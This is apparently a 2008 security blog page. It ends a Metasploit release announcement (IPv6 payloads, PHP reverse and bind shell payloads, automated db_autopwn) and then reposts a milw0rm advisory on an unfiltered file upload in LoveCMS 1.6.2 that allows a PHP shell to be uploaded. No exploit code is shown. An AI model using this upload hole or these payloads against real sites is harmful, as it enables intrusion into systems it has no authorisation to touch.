exist for the Windows and Linux platforms, opening the door for penetration
testing of pure IPv6 networks. The VNCInject and Meterpreter payloads have
been extensively tested over IPv6 sockets.

Efrain Torres's WMAP project has been merged into Metasploit. WMAP is
general purpose web application scanning framework that can be automated
through integration with an attack proxy (ratproxy) or be accessed as
individual auxiliary modules.

Egypt's new PHP payloads provide complete bind, reverse, and findsock
support for PHP web application exploits. If you are sick of C99 and R57
and looking to gain a "real" shell from one of the hundreds of RFI flaws
listed on milw0rm, the new PHP payloads work great against multiple
operating systems.

The db_autopwn command has been revamped to support port-based limits,
regex-based module matching, and limits on the number of spawned jobs. The
end result is a way to quickly launch specific modules against a specific
set of target machines. These changes were suggested and implemented by
Marcell 'SkyOut' Dietl (Helith).


Enjoy the release,

hdm mc egypt
pusscat ramon patrickw
I)ruid et kkatterjohn
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework

Kamis, November 27, 2008

LoveCMS 1.6.2 Final (Download Manager v1.0) Arbitrary File Upload Exploit

Download:
http://www.thethinkingman.net/modules/download_manager/?id=16

Description:
This exploit allows attacker to upload any type of file [no extension filtration] ex. php shell...
Uploader is adding random number on the begining of file name so user have to check it manually.
for more information check /modules/download_manager/admin/index.php lines 10 - 27.


# milw0rm.com

Twitter Delicious Facebook Digg Stumbleupon Favorites More